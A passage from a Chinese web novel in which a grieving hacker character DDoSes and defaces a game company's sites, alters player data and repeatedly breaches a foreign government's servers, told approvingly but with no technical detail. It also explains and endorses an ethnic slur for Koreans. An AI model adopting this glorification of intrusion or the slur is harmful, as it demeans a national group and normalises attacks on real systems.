林雨生走下来,田依这天请了假在幕后看她。林雨生有点意外,加快脚步走过去,仅仅把心爱的女孩抱住。

对于林雨生来说,如果时间可以静止,那么他会选择这一刻。


 第二十六章  秋


公寓里静悄悄的,安静得很有些落寞。需要搬走的东西都已经打包整齐,危险漫步坐在其中一个纸箱上,长长的头发遮住的秋日的阳光。公寓外面的泡桐树夜落班了院子,风徐徐吹过,发出沙沙的声响。

叶落的季节离别多。

今天一大早,萧让匆匆坐上离开古店的火车,驶往赤城。前几天,方小小把她游戏里的所有装备物品包括财产都转到了萧让的账户里,然后再也没有上线过。QQ不回,电话也没有人接,萧让按耐不住,终于决定去找她。

列车带着一路的尘土,载着疲惫的旅人到这座陌生的城市。赤城于湘江下游和湘浏盆地西缘,已有上千年的历史。车站人来人往,列车的鸣笛声此起彼伏,四周恍惚的灯火,掩映少年孤独的灵魂。

萧让走下月台,街上两边的香樟透过灯光交错的斑驳,清冷的世界,人声嘈杂。陌生的旅店无法卸下身上的疲惫,看着面前灯火辉煌的城市,萧让浑身充斥着无力感,他沉沉睡去,夜里常从梦中惊醒,半睡半醒中,却记不得梦境的内容是什么。

第二天一早,萧让前去方小小的家,敲开门,等待他的只有她的父母,和父母脸上明显的泪痕。

方小小前几天做了场大手术,没挺过来。看着墓碑上清秀的面容,萧让泣不成声。

“骗子,说好嫁给我的呢。”

林雨生回来的时候,搬家的货车也想跟着来了,大学城在古店郊区,距离古店高中有不小的距离。新租的房子比原来的公寓要大一些,林雨生很喜欢小区的名字:水榭花都。

也许是般新房子的原因,也许是因为少了一个人的缘故。也许都不是。危险漫步把萧让的东西搬进一个房间,两人各自收拾东西。以前和萧让两个人的时候相处融洽,后来变成三个人,亦其乐融融,只是,当三人又把变成两个的时候,深深的违和感在他们身上缠绕许久才消失。

老萧的离开让危险漫步备受打击,他变得很暴躁,一度失去引以为傲的冷静。他几乎成了自己最讨厌的那种人,极限狂飙成了他发泄的对象,黑玩极限狂飙的官网,又用DDOS打瘫极限狂飙的服务器,导致三大区玩家全都上不去。等那边好不容易修好服务器,又接到众多玩家的投诉,他们的S车A车数据被篡改,本来直线能达218 km/h的速度,现在只有100km/h不到。

黑完游戏,危险漫步矛头直指ACM公司。ACM公司旗下有不少火爆的游戏,但是这些游戏都是为充钱的玩家而准备的,不充钱的玩家只有被揍的份。ACM的公司的网站首页变成了一个自动存款机的图片,下面配文——ACM存款机。

危险漫步继而通过贴吧、微博、论坛召集群众,象ACM公司发起炮轰,抵制无节制的坑钱游戏行为。本来ACM公司请黑白两边的人缉拿三番两次和自己过不去的黑客,结果黑客没抓找,自己后院倒失火了。ACM运营总监起初以这是最好的炒作为由,向上上下下安慰,结果炒作了一个多月,ACM的名声越炒越臭,加之旗下四大游戏接二连三地反反复复地被打瘫又瘫,玩家以几何速度减少,和ACM公司一直合作的UC、腾讯、安室也不再继续与之合作,ACM腹背受困,终于做出了一个明智之举——让运营总监卷铺盖回家。

ACM终于顶不住舆论的压力,网站关闭三天,游戏因更新停止三天。三天之后,官网出现了公告,表示已经修复几大游戏内的BUG,又进行了众多的优化,更加适应玩家。游戏纷纷升级,升级完的游戏界面都不再相同,名字也纷纷+1,极限狂飙变成了极限狂飙2.0,勇者无谓4.0变成了勇者无谓5.0,等等。

众多的游戏玩家终于没有精力再去折腾,加之之前活跃的玩家都不同程度地受到了ACM发的游戏礼包,此时逐渐平息。危险漫步并不想就此收手,恰逢此时H国跳了出来,充当了ACM公司的替罪羊。

事情是这样的,H国政府为加强自身网络的安全,决定面向全球招聘安全高手,海选条件是必须攻入一台H国指定的服务器,在服务器上留下名字。H国会向留名的之后便会收到韩方的正式邀请,到H国参加第二轮的选拔。

H国又叫棒子国,危险漫步对他们素来不感冒。关于H国为什么叫棒子国,说法有三。

一,H国盛产玉米,玉米又叫棒子,所以H国就被称为棒子国,而H国人,就被称为棒子。

二,那一年H国的国王来北京朝见乾隆,乾隆很高兴,在紫禁城宴请他,席间有人端来一盆净手水,为了消毒和增加香味,这盆水里加了点花瓣和盐。H国国王以为是汤,就端起来喝了几口,然后大赞好喝,乾隆见了大笑,对H国国王说:“你真是个棒子啊”。棒子在北京方言里就是棒槌,意为傻子的意思。H国国王并不懂,以为皇帝封他什么大官,赶紧谢恩。从此H国国人就叫棒子,H国变成了棒子国,就是说韩国人的愚昧无知而已。

三,倭国占领东北的时候,低层的保安多是H国人,由于他们也是二等公民,倭人对他们不信任,不配备枪支,只发一根棒子。可是这些H国人却喜欢欺负中国人,动不动就拿警棍打中国人,于是人们就把这些H保安叫棒子。

不管出于哪一种,危险漫步对棒子总之是很讨厌的。他见H国将消息挂在他们政府的官网上,便打起了主意。危险漫步拿下官网和服务器没费什么功夫,他犹豫的倒是自己应该签什么名字好。起先想签路见不平一声吼,随即又打消了念头,改签危险漫步。在指定的服务器上签完名后,又跑去官网签,签完再留下一行字:旅游完了这个景点,有点失望,下次懒得来了,宛如一个筛子。

H国的招聘还没正式启动,便颜面大损,他们对危险漫步的入侵矢口否认,又发公告声称自己的服务器非常安全,危险漫步入侵的事情根本子虚乌有,纯属是有人利用ps出来的假图片造谣生事。危险漫步看见后,觉得好笑。众所周知,黑客入侵大型网站,无论成功与否,一种手段只能用一次,再用就会有被反追踪的风险。危险漫步第一次入侵的时候,自己一眼看穿的漏洞就有三个。他换一种方式,再H国官网的最新公告后方加入几个字:哦吼?危险漫步留。

如果第一次大家对危险漫步的动作震惊而僵硬,那么危险漫步第二步就引起很大的轰动了。H国方面想不出好的回应,继续以老方法回应,说是网友P图。不过,这次已经没多少人相信他们了,很多图片的来源都是网友亲自截的。

另一方面,H国将炒作已久的招聘计划延迟半年,半年内,他们从美国请来了四名赫赫有名的安全大师,重新设置了一台他们称之“完美”的安全测试服务器。

H国拙劣的表演遭到众多黑客的唾弃,半年后,招募开始,前来应聘的高手寥寥无几。

可惜,这个被吹上天的完美服务器又一次被危险漫步打成了筛子,他把危险漫步四字一留,转身又拿下H国《中央日报》的官方网站,在那里告诉H国,以后别再举办这种丢人的招聘会。

自此,危险漫步名扬天下。

与H国的较量似乎成功转移萧让离开带来的悲伤,萧让一直没有消息,几个社交软件一直离线,从来不回,手机变成了空号。危险漫步把萧让卧室的门反锁,拆开钥匙环,将钥匙一把一把地滑进卧室。

“雨生,危险漫步只有两个人了。”

林雨生放下手里的咖啡,回过头望着危险漫步:“就算只剩一只狼,那他也是个群体。他从来都是孤独的,也永远是灿烂的。”

危险漫步骂了句非主流,缓缓走到电脑前。H国的契机的确让危险漫步声名大噪,但他暂时并不愿做下一步行动,时机甚至还不成熟。

外面兀地响起一声惊雷,毫无预兆。天空风起云涌,方才还是明亮的天空,此刻变得幽暗起来乌云滚滚,天庭仿佛在酝酿着什么阴谋。只听见天空一阵咆哮声,雨像箭一样射下来!伴随着随着震耳欲聋震耳发聩雷声,疾风骤雨顷刻间铺天盖地。云层逐渐断裂开,金色的闪电张牙舞爪地在空中漫舞,云间暗涌的冷金色,仿佛有一团火焰在其间燃烧。

路上的行人纷纷遁逃,突如其来的雨肃清了来来往往的行人。房顶上,街道上,溅起一层白蒙蒙的雨雾,宛如缥缈的白纱。一阵风猛刮过来,那白纱袅袅地飘去,雨点斜打在街面的积水上,激起朵朵水花。 

危险漫步和林雨生在窗前看着倾盆大雨,直到屋里的光线仅靠显示器维持,也没有人起身去开灯。

雨下了五个月零十七天。其间有细雨蒙蒙的日子,人们盛装出门,带着大病初愈的神情等待晴天。但是很快的,人们就习惯了这不过是滂沱重现的前奏。

四月的一个下午,危险漫步和林雨生坐在窗前看雨里的世界。几个越来的很多时间里,他们就这样从容地在窗前,见雨变着花样地落下。

帘外雨潺潺,春意阑珊。

危险漫步对林雨生说,这雨要停了。果然,到了傍晚,云层尽伞,天空似童年般蔚蓝。太阳在西边的尽头露出红红的笑脸,虽然很快就沉入山里,不过,明天的确是一个晴天。

危险漫步有些遗憾,他非常喜欢雨天。林雨生也是,从出生开始,注定了一生与雨为伴。看着逐渐幽蓝的天际,危险漫步忽然响起多年以前给汪青蓝通过的那通电话,他还记得那天他们说了什么,却已经完了究竟多少年过去了。


尾声

 一

“喂,文欣吗?下午有空吗?”

“嗯,是我。下午有空唉,你要约我呀。”

电话那头传来熟悉的声音,慵懒而温和。

“不是啦,我想买件衣服送给我女朋友,想要给她惊喜,却又不知道女孩子喜欢什么样的,不知你能不能和我一起去挑。”

“这样啊,嗯……好吧,下午两点,语晞服饰城二楼见。”

挂了电话,他暗暗高兴,而另一边的她心里却有些难过。回想起来,也是这样一个大雪纷扬的日子,那个笨笨的男孩结结巴巴地说我喜欢你。对于这个在班里并无多少交集的男孩儿,她对他没有什么感觉,当然也没有讨厌,他们的关系,也就是出了教室成为路人的关系。

拒绝的话说得再好也会让人难过,何况是沉默?

十年过去了,是啊,十年了,原来时光是这么的快。十年,身边的人换了一批又一批,说好要在先结婚的人婚礼上当伴娘的闺蜜也杳无音信。只有这个笨笨的男孩,一直陪伴着她。当然,这个笨笨的男孩已变了模样,只是爱她一如既往。

他不爱我了,身边的人渐渐远去,要我替她女朋友挑衣服,也好,毕竟人家爱了你十年。

替她女朋友挑衣服?有没有搞错,我变成什么了?可不可以不要这么讽刺?

万一后来和她女友撞到了呢?怎么说?会不会被骂成小三?不不不,不可能。她女朋友一定很漂亮吧,真讽刺,我到时候得有多尴尬。

打个电话回去吧,拒绝算了。

算了,都答应下来了,反悔岂不是更没面子。

等等,干嘛啦,我为什么这么在乎,我不会爱上他了吧!

不不不,不会的,我怎么可能喜欢他,对他,一直不都是朋友吗?

不对啦,朋友找我替女朋友挑衣服,会这么难过吗?一直以来对他都是理直气壮地,好像,感觉一下子少了什么似得。

推开门,雪依然很大。像往常一样,她不爱打伞,更别说是雨衣,任飘摇的雪落到她的衣服上。雪钻进衣领,挺冷。

到底要让我等多久啊,说好的2点到,结果现在才出门,又不打伞,唉——他心里暗想着。喜欢了十年的女孩子,想在今天应该可以结束了。

“哎,你怎么又不带伞。”

“哇啊,吓死我了,汪青蓝,你从哪里冒出来的,不是说好了在服装城会合的吗?”

“我猜你又不带伞,天这么冷,会生病的。”

她没说什么,默默地和他挤在一把伞下,心里想,为什么,你到这个时候还对我这么好?

突然,她神经质地跳出伞外:“喂,你谁啊,为什么我要听你的?”

“干嘛啦,你要不愿意和我撑一把伞,你可你被雪淋着。”

“那也不用你的伞!”她固执地走在外面,不去看他。

“喏,拿去。”

“什么啊?”她没好气地对他说。

他递过伞,把衣服上的帽子戴上。她一时无措,视线变得模糊起来。印格的伞,深蓝浅蓝,分外好看。她夺过伞,自顾自地走,不管他。

气氛似乎有些尴尬。往日只有他们两人的时候,他一定会拼命地找话题,有时候甚至会觉得喋喋不休。她会觉得烦,烦得温暖。而现在,他保持沉默,静静地走在她的声旁。

“汪青蓝,帮我拿伞啦,我累了。”

“嗯。”

这天是情人节,街上都是情侣。都是一种场景,“千人一律”,男人撑伞,女人的头放在男人的肩上,要么就是挽着男人的手臂。姿势不知该说是优雅还是不雅。

假如有车刹车失灵,这个样子一定是躲不过去的,公共场合唉,能不能矜持点啊。她没好气的想。余光望向身旁的他,宽阔的肩膀,足够她靠。距离,生硬的距离提醒了他们的关系。

街上这么多人,被看到我们这个样子,一定会被耻笑的吧。话又说回来,谁又会在乎我们呢?她想挽住他的手臂,却又不敢。会不会,太过于唐突?他是有女朋友的人了。他有女朋友就不能挽他胳膊啊,我以红颜之名还不行吗?哎呀我怎么这么贱。

“哎,汪青蓝,今天……今天是情人节唉。”她小心翼翼地说。

“是啊,今天是情人节,所以说啊,我才要打算买衣服送给她,怎么了么。?”转过来的脸,好熟悉。却为何笑的那么陌生?

“没有,没事。”

“两位,欢迎光临,要给你女朋友买衣服吗?”售货小姐带着招牌式的微笑,显然,她误解了他们的关系。他并没有解释什么。

“我想买件女士衣服。”

是买件女士衣服,好僵硬的字眼。与期待中的,给她买件衣服相差好远。十年,时间名词,多用与小说电视剧,被各种虐心又美好的爱情故事贯穿。在现实中,是个尴尬的组合。我们相聚一个尴尬的距离,所以,彼此之于彼此只有尴尬。

“要什么样的呢?外套吗?”

“是的。我先看看吧。”

“文欣,你觉得买什么样衣服送给她好呢?”他对她说。

“嗯……羽绒服怎样?这个冬天蛮冷的,送羽绒服吧,别把人家冻着。”她一本正经地回答。

他暗想,现在的女孩子,冬天再冷也大多不愿穿臃肿的羽绒服,何况这个冬天就快要过去了。不过,没有关系。

“嗯,好,羽绒服在那边,走,过去看看吧。”

“你觉得这件怎样?”她拿起一件羽绒服,给他看。他差点没气死——款式很普通,比起普通,用糟糕更合适一些。颜色是暗紫色。怎么说呢,六十岁以上的老奶奶的标配。他的奶奶的确有这么一件羽绒服。她拿这件,目的已经很明显了。他依然一副风云不惊的样子,对售货小姐说:“我要这一款的,她身高一米六九,体重大概——身材和她差不多。”他指着她说道。

169?和我一样高?身材也岂不是和我差不多?他在找个我的替代品吗?不不不,我也只是大众身高,又没有很胖或者很瘦,找个差不多的也很正常。

“你好,这一款式红色的对吗?嗯好,建议你买XL的。”售货小姐说。

“别别,冬天羽绒服里面要穿衣服穿才暖和,XL太小了,买XXXL的吧。”她抢着对售货小姐说。

“XXXL?那是本店最大款,你穿是不是……”

“没错没错,就要XXXL款的。汪青蓝,你觉得呢?”

“你觉得合适,那就再合适不过了。”话这么说着,他心想,把这件衣服送出去,谁都会生气吧,不过没有关系,因为是她要的。

走在大厅里,他突然对她说:“抱歉,你在这儿等我一下,我去上个厕所。”不等她答应,他就向厕所的方向飞奔。

来来回回的都是成双成对的情侣,只有她一人坐在凉凉的长椅上,百无聊赖。

他这是去多久啊,怎么还没有回来。突然,电话响了。

“喂,人呢,什么?有事?要我在这等你?有没有搞错啊?好吧好吧好吧,快点哦。”挂了电话,她没好气地说:“气死了。”

一个小时过去,两个小时过去,手机里几乎所有的软件她都玩过一遍了,他还没回来,连个电话也没有。再等等吧

再等等吧。

天慢慢变暗,大厅里灯光亮的耀眼。

“喂,人呢,死哪去了!再不回来,衣服我不管了了哦!”她冲着电话喊。另一头,他的声音却不急不慢地:

“什么啊,你还在那里哦,你在那干嘛,我都到家了。”

“你到家了?没搞错吧,你把我一个人丢在这儿!算了,不管了,我也回家了,衣服就放,嗯,一二三,左数第五个椅子上,你不要就算了。”

“等一下,什么衣服我不要了,本来就不是我的,我当然不会穿女式衣服,而且,那件衣服,估计我穿了都大,跟何况是一个169cm,51KG的女生。”

169cm51KG?“喂,难道说,这件衣服是给我的?也就是说……”

“是啦,我一秒钟的灵感,你花了整整3个小时才明白过来,真笨哎你。”

“我告诉你,我才不会穿一件像被子一样,而且又难看的衣服。”

“是吗,可是,文欣,你嘴角的弧度好像把你给出卖了。”

“嘴角的弧度?哎,你在哪儿?你没在家里?”

 “出来吧,你出来就能看到我了。”

她披上羽绒服,没想到,这件衣服还刚好能套下她的风衣。她快速向外走,笑容漫上她的脸庞,却又湿了眼眶。

朦胧中,那个熟悉的身影 ,她向他跑去,她看见他穿的黑色大衣,有些模糊。

他站在路口,望着向自己奔跑的女孩,他想,十年的悸动终于结束了,是的,应该结束了。他看见她奇异的穿着,那件紫色的羽绒服。他笑了,在这一天,他得到了一个答案。他又看见了她身后城市的霓虹,他仿佛也看见了他们以后的日子。他想给她一个拥抱。他闭上了眼,他觉得闭上眼能看见更多。

但,他看不见身后的车,就像身后的车看不见他。

又是一个十年。曾经的姐妹都回来了,都有了孩子,大一点的,都有最初那个他大了。唯独她,孑然一身。

看着眼前的百合,嘲讽感又涌上心头。喜欢十年的男孩——也只能叫他男孩了,连他喜欢什么样的花都不知道,也永远没有机会问他了。我最喜欢百合,你应该也会喜欢吧?

现在,我们彼此不尴尬,我们相距的,是一个世界的距离。

今天的雪很大,还记得吗,那一天,下的也是这样的雪。

天黑了,再见。过了今晚,我们相距的,不,过了今晚,我们之间就没有距离了。


 二


走过检票口的时候,萧让的手里握着两张电影票,虽然,他只有一个人。老萧真的老了,虽然他的面容一如年少般清秀,但是头发却已经如老者般地斑白。

电影开始了,老萧的身边没有人,甚至,整个三号厅也没人。当初和小小约定好一起来看这部电影,如今,这除了永远无法完成的夙愿。

这是一部动作、犯罪的影片,老萧却黯自流泪。离开的时候,整个厅里响起了音乐,放的,竟然是恋人心。

化作风化作雨化作春走向你 梦如声梦如影梦是遥望的掌印 化作烟化作泥化作云飘向你 思如海恋如城思念最遥不可及

萧让穷其一生,全都沦浸在这份思念里。遥遥无期。

马尔克斯说,过去都是假的,回忆是一条没有归途的路,以往的一切春天都无法复原,即使最狂乱且坚韧的爱情,归根结底也不过是一种瞬息即逝的现实,唯有孤独永恒。

所有的灿烂,终究要用孤独来偿还的。


 三


那一天,阳光灿烂。

林雨生、田依、危险漫步及楚虹四人来到了那片野地。野地上长满了绿草,芳草青青,随风浮动。远山上的长青树经过一个冬天的历练变得更加青翠欲滴。远远看去,只见那一片绿拔地而起,耸入云霄。山脚下,长着一排排柳树,郁郁葱葱,亭亭玉立。柳条卖弄着婀娜的身姿,摇曳着优美的枝条,春风里,柳絮飞扬,忽如一夜北风来,漫天飞雪银皑皑。柳树以东,是巍巍的山,柳树以西,便是野地。柳树下有一条小溪,春风十里,溪水漪漪。溪水弯过野地,穿过远处坡下的岩石缝隙,流入大海。溪水两边还生长着簇簇野花,粉的、白的、红的。在这一片绿中,不卑不亢地开着。

危险漫步伸了个懒腰:“真是个好地方,附近怎么没有人居住啊!” 

“是啊,这儿简直就是世外桃源呢,这么好得景色,若是没有人烟,岂不是感觉有些荒凉?”

林雨生环顾四周,景色确实是无懈可击,但是知道这个地方的人很少,而知道这美丽下所掩盖的肮脏与丑陋的,那就更少了。半晌,林雨生叹了口气:“怎么没有人住,我以前就住这儿,只不过后来拆迁了。”他就着重点说,尽量不回忆起那些往事。 

“这样说的话……难怪我们不知道这儿,只有你知道”楚虹看了看四周,又看了看林雨生“也就是说,这儿算你的故乡喽?”

“呵呵,算是吧。”林雨生苦笑,坐到地上,用手臂环住膝盖,身体的力量仿佛被抽空了一般。林雨生望着远方,有些无奈。

“哎哎,雨生,那个拆迁用来干什么啊?”危险漫步问道。

“不清楚,反正要搞什么东西。”

“那为什么没搞呢?”

“没钱。”

“钱呢?”

“贪污了。”

“谁贪污的?”

“当官的。”

“当官的?当官的人呢,找他们去啊!”

“三个人,一个跑了,一个进了监狱,还有一个被民众打成了植物人。”

“都什么跟什么啊!”危险漫步又伸了个懒腰:“乱七八糟的!”说完便躺了下去,身体在草坪上展成一个“大”字。嫌阳光刺眼,他随手从包里摸出一本书,扣在脸上。

“什么书啊?”林雨生问道,在他印象中,危险漫步很少看计算机之外的书。

“《大卫·科波菲尔》”危险漫步的声音从书下传出来,头也不抬。

“书怎么样?”

“第一卷厚度正好,不沉,扣在脸上很舒服。大小也很合适,阳光进不来。”

“呃呃,我不是说这个,我是说书的内容怎么样。”

“不错”

林雨生无言以对,也无事可做,干脆像危险漫步一样躺下。静静地躺着,看蓝得很清澈的天,望白得很纯净的云。过长的草抚摸着林雨生的脸颊,测过脸,看一边的花随风摇曳。

田依气呼呼地走了过来,说道:“喂!我说你们两个,我们来这里是睡觉的吗?”田依望着林雨生和危险漫步喊道。

“不是”林雨生幽幽地来了一句,没有表情——脸被书扣着——他拿第二卷扣的,厚度也刚好适合。

“那你们躺下干嘛?”

“累了。”

“累了就躺下吗?我现在也累了,难不成要跟你们一样躺在那里啊!”

“有何不可?”林雨生把两臂向上伸了伸,做耸肩状。

“不要用这种语气跟我说话,像精神病人!”

林雨生只是“哦”了一声,不置可否。

“你哦什么哦啊!你们在那里躺着,那我干什么啊!”

林雨生把书拿开,抬起头,打量着田依:“要不你来我怀里躺着吧。”

一旁的危险漫步忍不住笑出了声,田依脸一红,骂了句不要脸。

不过,她还是在林雨生的身边躺下,林雨生伸出胳膊,田依不客气地先狠狠捏了一下。

远远地,听见有人哼着歌儿走了过来。是楚虹,她手上还有她刚采的花。

休息了一会儿,一行人继续向海边走去,阳光下,两个男生并肩前行,欢声笑语;女孩门拢起被风吹乱的头发,衣裙漫飞。